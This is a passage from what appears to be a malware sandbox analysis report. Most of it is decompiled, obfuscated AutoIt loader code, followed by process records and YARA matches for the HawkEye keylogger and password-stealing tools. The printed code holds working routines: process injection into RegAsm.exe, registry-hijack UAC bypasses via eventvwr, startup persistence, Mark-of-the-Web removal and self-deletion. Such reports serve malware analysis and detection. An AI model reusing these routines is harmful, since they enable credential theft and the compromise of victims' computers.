($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) ENDIF ENDFUNC FUNC USZSAMCSMTSYZPPJDEGTV () IF @SCRIPTDIR <> $QCTGPDCYIKISRF THEN SHELLEXECUTE (@COMSPEC , "/k ping 127.0.0.1 -t 0 & del " & @AUTOITEXE & " & exit " , NULL , NULL , @SW_HIDE ) ENDIF ENDFUNC FUNC HEDXSPJMYHOVXLWDCYOBPIE ($KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQNAME , $FILENAME , $RUN , $RUNONCE , $DIR ) $OUBJOAAIMSDPJLUJMOJFFYTES = VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ($KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQNAME , "10" ) SWITCH 0 CASE (+ 4294967239 - + 4294963976 = 3263 7492 + + 4294961195 + 4294961363 + 5923 + + 4294959617 = + 4294960998 + 4294966597 - + 4294960065 + 4294962525 - + 4294961759 = 7298 ) FILESETATTRIB ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV2 [$I ] , $ATTRIB ) CASE (2187 + 1076 + 5480 = 8743 4917 + + 4294961081 + 4992 = 3694 6730 + + 4294965085 + 4294966507 + 1432 = 5162 ) LOCAL $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS = DLLCALL ("kernel32" , "ptr" , "VirtualAlloc" , "dword" , "0" , "dword" , $OUBJOAAIMSDPJLUJMOJFFINL , "dword" , "0x3000" , "dword" , "0x40" ) ["0" ] CASE (8846 - + 4294962944 - + 4294962679 + 4294965792 = 8886 4093 + 4294963430 + 8659 = 2389 + 4294963014 + 6671 = 16311 ) $FILE = DLLSTRUCTGETDATA ($OUBJOAAIMSDPJLUJMOJFFYTES , 1 ) CASE (+ 4294964059 + + 4294962924 + + 4294967138 - + 4294963385 = + 4294963440 + 4294958474 + + 4294963442 + + 4294960807 - + 4294960557 - + 4294958531 = + 4294963635 + 4294961634 + + 4294965767 + 4294965096 + 4294961286 + 4291 = + 4294956186 ) LOCAL $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) CASE (8846 - + 4294962944 - + 4294962679 + 4294965792 = 8886 4093 + 4294963430 + 8659 = 2389 + 4294963014 + 6671 = 16311 ) $FILE = DLLSTRUCTGETDATA ($OUBJOAAIMSDPJLUJMOJFFYTES , 1 ) CASE (8846 - + 4294962944 - + 4294962679 + 4294965792 = 8886 4093 + 4294963430 + 8659 = 2389 + 4294963014 + 6671 = 16311 ) $FILE = DLLSTRUCTGETDATA ($OUBJOAAIMSDPJLUJMOJFFYTES , 1 ) ENDSWITCH LOCAL $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ = GETDIR ($DIR ) & "\" & $FILENAME SWITCH 0 CASE (+ 4294966619 + + 4294963176 = + 4294962499 + 4294965711 - + 4294961778 + 4294961425 = + 4294965358 + 4294962989 + + 4294964067 + 4294963675 + + 4294966201 = + 4294955044 ) SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (8312 + 1982 + + 4294962964 + + 4294959945 = + 4294965907 3710 + 4294963974 + 4294966283 + 8277 - + 4294962055 = 12893 6311 + + 4294966087 + 596 = 5698 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CASE (5760 + + 4294958626 + 4294966279 + 4294963960 = 4439 + 4294964550 + 1282 + 7776 + + 4294965423 = + 4294956867 + 4294964669 + + 4294962298 + + 4294965903 + 3076 + + 4294962809 = + 4294960033 ) LOCAL $AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ = FILEOPEN ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ , "2" ) CASE (7185 + + 4294961171 + + 4294965364 - + 4294966204 + 4294960669 = + 4294960889 + 4294960604 + 4294962356 + 8860 = + 4294964524 + 4294965140 - + 4294963510 = 1630 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (5760 + + 4294958626 + 4294966279 + 4294963960 = 4439 + 4294964550 + 1282 + 7776 + + 4294965423 = + 4294956867 + 4294964669 + + 4294962298 + + 4294965903 + 3076 + + 4294962809 = + 4294960033 ) LOCAL $AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ = FILEOPEN ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ , "2" ) CASE (5760 + + 4294958626 + 4294966279 + 4294963960 = 4439 + 4294964550 + 1282 + 7776 + + 4294965423 = + 4294956867 + 4294964669 + + 4294962298 + + 4294965903 + 3076 + + 4294962809 = + 4294960033 ) LOCAL $AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ = FILEOPEN ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ , "2" ) ENDSWITCH FILEWRITE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ , $FILE ) FILECLOSE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ ) IF NOT $RUNONCE THEN IF $RUN THEN SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ ) ENDIF ELSE IF @SCRIPTDIR <> $QCTGPDCYIKISRF THEN SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ ) ENDIF ENDIF ENDFUNC FUNC VMEUSMQQSSASICXZMBSLGU ($FILE , $REGKEY , $ATTRIB , $HIDDEN , $TGSFDS = "caca" ) SWITCH 1 CASE (8549 + 4294967162 = + 4294960174 + 4294962579 + + 4294964891 = + 4294950631 + 4294958887 + + 4294963929 + + 4294960194 + 2213 = 8415 ) PROCESSCLOSE (@AUTOITPID ) CASE (+ 4294964735 + 1132 + 2144 + + 4294967079 + 4294963292 = + 4294955842 656 + 4294964955 + + 4294965012 + + 4294963622 + 4294963485 = 113 + 4294964159 + 4294961883 - + 4294958633 = + 4294963790 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (3063 - + 4294965455 + + 4294962885 + 4294962450 = + 4294962943 8788 + 8872 = 17660 8640 - + 4294962594 + 4294965715 + 4294959266 - + 4294963973 = 7054 ) DIRCREATE ($QCTGPDCYIKISRF ) CASE (45 + 2404 + 4294960043 - + 4294966245 + + 4294967082 = 91 + 4294965573 + 1814 = + 4294960772 + 4294962347 - + 4294962917 + 1142 + 1315 + + 4294958885 = + 4294963329 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (3063 - + 4294965455 + + 4294962885 + 4294962450 = + 4294962943 8788 + 8872 = 17660 8640 - + 4294962594 + 4294965715 + 4294959266 - + 4294963973 = 7054 ) DIRCREATE ($QCTGPDCYIKISRF ) CASE (3063 - + 4294965455 + + 4294962885 + 4294962450 = + 4294962943 8788 + 8872 = 17660 8640 - + 4294962594 + 4294965715 + 4294959266 - + 4294963973 = 7054 ) DIRCREATE ($QCTGPDCYIKISRF ) ENDSWITCH LOCAL $IPPNSZXFWUTJXQAWVFTS = $HIDDEN LOCAL $ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL = $QCTGPDCYIKISRF & "\" & $FILE LOCAL $DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU = $QCTGPDCYIKISRF & "\" & $REGKEY & ".vbs" LOCAL $OBBNXDUCPNVNYLY = @STARTUPDIR & "\" & $REGKEY & ".url" SWITCH 0 CASE (+ 4294958727 - + 4294963247 - + 4294958543 + 4294960323 + + 4294959444 = + 4294956704 + 4294966055 + 7288 = 6047 2343 + + 4294960521 - + 4294966093 - + 4294964843 + 4294964418 = + 4294963642 ) PROCESSCLOSE (@AUTOITPID ) CASE (1443 - + 4294964141 + + 4294965835 = 3137 + 4294963925 + + 4294959942 + + 4294958774 + + 4294964567 = + 4294945320 + 4294959827 + 5690 - + 4294958835 + 4294960091 + 5971 = 5448 ) DLLSTRUCTSETDATA ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ , "lpfile" , $LPFILE ) CASE (2521 - + 4294962748 = 5827 97 + + 4294964695 + 8331 = 12011 3082 + 3903 + 4294963899 + 8423 = 7069 ) LOCAL $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN = FILEOPEN (@AUTOITEXE , "16" ) CASE (1499 + 1756 = 3255 + 4294958631 + + 4294966665 = + 4294958000 6738 + 4294961273 + + 4294965801 - + 4294961381 = 5135 ) $MAINSTRUCPOINTER = DLLSTRUCTGETPTR ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC ) CASE (2521 - + 4294962748 = 5827 97 + + 4294964695 + 8331 = 12011 3082 + 3903 + 4294963899 + 8423 = 7069 ) LOCAL $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN = FILEOPEN (@AUTOITEXE , "16" ) CASE (2521 - + 4294962748 = 5827 97 + + 4294964695 + 8331 = 12011 3082 + 3903 + 4294963899 + 8423 = 7069 ) LOCAL $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN = FILEOPEN (@AUTOITEXE , "16" ) ENDSWITCH SWITCH 1 CASE (+ 4294958989 + 6936 + + 4294960576 + + 4294959019 + + 4294965344 = + 4294964617 + 4294966288 + 4294965625 = + 4294966409 2027 + + 4294964382 = + 4294948976 ) $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] CASE (1998 - + 4294962226 + 4294966763 = + 4294967017 + 4294965694 - + 4294962521 - + 4294964638 + + 4294961186 = + 4294961347 + 4294960714 + 633 = 6535 ) LOCAL $DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) CASE (3053 + + 4294966995 = 2752 + 4294966070 + 6344 + + 4294958753 + 4294960114 + 7152 = + 4294963841 8036 + + 4294966060 + 4683 = 11483 ) LOCAL $PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI = FILEOPEN ($ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL , "2" ) CASE (7182 - + 4294962091 + 4294967084 - + 4294962089 = 19435 7979 - + 4294962243 - + 4294964733 + 3840 = 21022 4013 - + 4294962213 - + 4294960126 - + 4294962540 = 17382 ) REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CASE (3053 + + 4294966995 = 2752 + 4294966070 + 6344 + + 4294958753 + 4294960114 + 7152 = + 4294963841 8036 + + 4294966060 + 4683 = 11483 ) LOCAL $PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI = FILEOPEN ($ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL , "2" ) CASE (3053 + + 4294966995 = 2752 + 4294966070 + 6344 + + 4294958753 + 4294960114 + 7152 = + 4294963841 8036 + + 4294966060 + 4683 = 11483 ) LOCAL $PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI = FILEOPEN ($ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL , "2" ) ENDSWITCH LOCAL $OUBJOAAIMSDPJLUJMOJFFINARY = FILEREAD ($REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN ) & BINARY (RANDOM ("0" , "255" ) ) LOCAL $URLCONTENT = "[InternetShortcut]" & @CR & "URL=file:///" & $ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL LOCAL $URLOPEN LOCAL $VBSOPEN SWITCH 1 CASE (+ 4294961555 + 2247 - + 4294966288 + + 4294967118 = 1052 + 4294960077 - + 4294959025 = + 4294965077 6493 + 4294960978 + + 4294964902 = + 4294964632 ) SHELLEXECUTE ("eventvwr" ) CASE (+ 4294963414 + 8752 + + 4294965939 + 4294963613 + 6695 = 15951 + 4294960241 + 4390 - + 4294958576 + 3437 - + 4294960837 = + 4294963075 + 4294962461 + 4294964607 + 6744 + + 4294963855 = 6525 ) DLLCALL ("kernel32" , "dword" , "VirtualFree" , "dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS , "dword" , "0" , "dword" , "0x8000" ) CASE (7171 + 4294960425 + 4294964215 = + 4294964515 7291 - + 4294961161 = 13426 6563 - + 4294963960 + 4294965134 + 4294959965 = 406 ) $URLOPEN = FILEOPEN ($OBBNXDUCPNVNYLY , "2" ) CASE (1858 + 4294964327 - + 4294964953 + + 4294963183 + + 4294963485 = 4806 + 4294963952 - + 4294962366 - + 4294959443 + + 4294962663 = + 4294957730 + 4294960691 + + 4294962753 - + 4294959835 - + 4294967214 + + 4294961335 = + 4294960604 ) LOCAL $AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ = FILEOPEN ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ , "2" ) CASE (7171 + 4294960425 + 4294964215 = + 4294964515 7291 - + 4294961161 = 13426 6563 - + 4294963960 + 4294965134 + 4294959965 = 406 ) $URLOPEN = FILEOPEN ($OBBNXDUCPNVNYLY , "2" ) CASE (7171 + 4294960425 + 4294964215 = + 4294964515 7291 - + 4294961161 = 13426 6563 - + 4294963960 + 4294965134 + 4294959965 = 406 ) $URLOPEN = FILEOPEN ($OBBNXDUCPNVNYLY , "2" ) ENDSWITCH SWITCH 1 CASE (+ 4294964357 + + 4294959463 + + 4294959370 = 21017 7887 - + 4294962944 + 2211 + 6567 = + 4294953995 + 4294958490 + 4294964436 + 4294965661 = + 4294948598 ) REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CASE (3419 - + 4294961531 - + 4294962604 = 13697 5522 - + 4294959121 = + 4294965727 1626 + 4804 + + 4294959049 + 248 = 13876 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (1524 - + 4294963339 + + 4294958700 = + 4294964181 5290 + 4294959862 + 4294961987 + + 4294959379 = + 4294951926 5604 + 4294962429 = 737 ) $VBSOPEN = FILEOPEN ($DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU , "2" ) CASE (5372 - + 4294963556 = + 4294943043 + 4294958949 + + 4294964486 + + 4294960557 + + 4294960939 = 6351 3083 - + 4294966044 + 1800 + 216 = 9112 ) $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] CASE (1524 - + 4294963339 + + 4294958700 = + 4294964181 5290 + 4294959862 + 4294961987 + + 4294959379 = + 4294951926 5604 + 4294962429 = 737 ) $VBSOPEN = FILEOPEN ($DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU , "2" ) CASE (1524 - + 4294963339 + + 4294958700 = + 4294964181 5290 + 4294959862 + 4294961987 + + 4294959379 = + 4294951926 5604 + 4294962429 = 737 ) $VBSOPEN = FILEOPEN ($DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU , "2" ) ENDSWITCH LOCAL $UAWZMRMLNVDLPAXAQO = EXECUTE ("Chr(34)&Chr(34)&Chr(34)" ) LOCAL $VBS = "Set WshShell = WScript.CreateObject(" & EXECUTE ("Chr(34)" ) & "WScript.Shell" & EXECUTE ("Chr(34)" ) & ") " & @CR & "WshShell.Run " & $UAWZMRMLNVDLPAXAQO & $ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL & $UAWZMRMLNVDLPAXAQO FILEWRITE ($VBSOPEN , $VBS ) FILEWRITE ($URLOPEN , $URLCONTENT ) FILEWRITE ($PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI , $OUBJOAAIMSDPJLUJMOJFFINARY ) LOCAL $FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV = [$URLOPEN , $VBSOPEN , $REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN , $PRHKQAPJBDGMOYQHNKCCTDTPRCYIUEPSJUNSSPNOYBI ] FOR $I = "0" TO UBOUND ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV ) - "1" FILECLOSE ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV [$I ] ) NEXT LOCAL $FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV2 = [$ILUBWBMPBGTDJUPBRMLAKVCQEZMDWAUNXJZEVLWXLPVOZGOWL , $QCTGPDCYIKISRF ] FOR $I = "0" TO UBOUND ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV2 ) - "1" FILESETATTRIB ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV2 [$I ] , $ATTRIB ) NEXT ENDFUNC FUNC GETDIR ($INDEX ) LOCAL $BKKJHJLDVEYSZMTHUBTEKIUJREJAMELPEDMWMRFSVOSPVMLDTVSFREOSQB = [@TEMPDIR , @APPDATADIR , @SCRIPTDIR ] RETURN $BKKJHJLDVEYSZMTHUBTEKIUJREJAMELPEDMWMRFSVOSPVMLDTVSFREOSQB [$INDEX - "1" ] ENDFUNC FUNC REMOVEZONEID () FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) ENDFUNC REMOVEZONEID () ZAAOVMXICJWJRRBGUADERMITN ("MdmDiagnosticsTool" ) LOCAL $IAHZOETNXYCDXIFHZTGAVGFJ = DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("SearchProtocolHost1" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ &= DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("browseui2" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ &= DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("DXCap3" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ &= DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("CompMgmtLauncher4" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ &= DLLSTRUCTGETDATA (VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ("upnpcont5" , "8" ) , EXECUTE ("1" ) ) $IAHZOETNXYCDXIFHZTGAVGFJ = QDAFJTRQZX ($IAHZOETNXYCDXIFHZTGAVGFJ , "pfbbylnnwxfmxxcjnorprwsicowdhtpxzmvsmsweotmvdzrhdh" ) $QCTGPDCYIKISRF = @APPDATADIR & "\winlogons" $RYQPPGEZBPAABSZNGQLSWMJIF = @HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" MKAWTJCTRCEZDEDBUQPZGMLXI ($RYQPPGEZBPAABSZNGQLSWMJIF , "" , $IAHZOETNXYCDXIFHZTGAVGFJ , FALSE ) VMEUSMQQSSASICXZMBSLGU ("winlogons.exe" , "winlogons" , "+R" , FALSE )

                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                    No network behavior found

                                                                                                                                                                                    Statistics

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:19:15:10
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Users\user\Desktop\slowday.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\slowday.exe"
                                                                                                                                                                                    Imagebase:0xdc0000
                                                                                                                                                                                    File size:2010624 bytes
                                                                                                                                                                                    MD5 hash:A172F4B0FA1A44CB60901944CFF7F8ED
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                    Start time:19:15:11
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                                                                                                                    Imagebase:0x7c0000
                                                                                                                                                                                    File size:53248 bytes
                                                                                                                                                                                    MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.508932595.0000000003234000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.507298136.0000000003106000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.507684707.0000000003176000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.507061368.0000000003012000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:19:15:15
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.251237329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.250547287.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                    Start time:19:15:22
                                                                                                                                                                                    Start date:23/04/2022
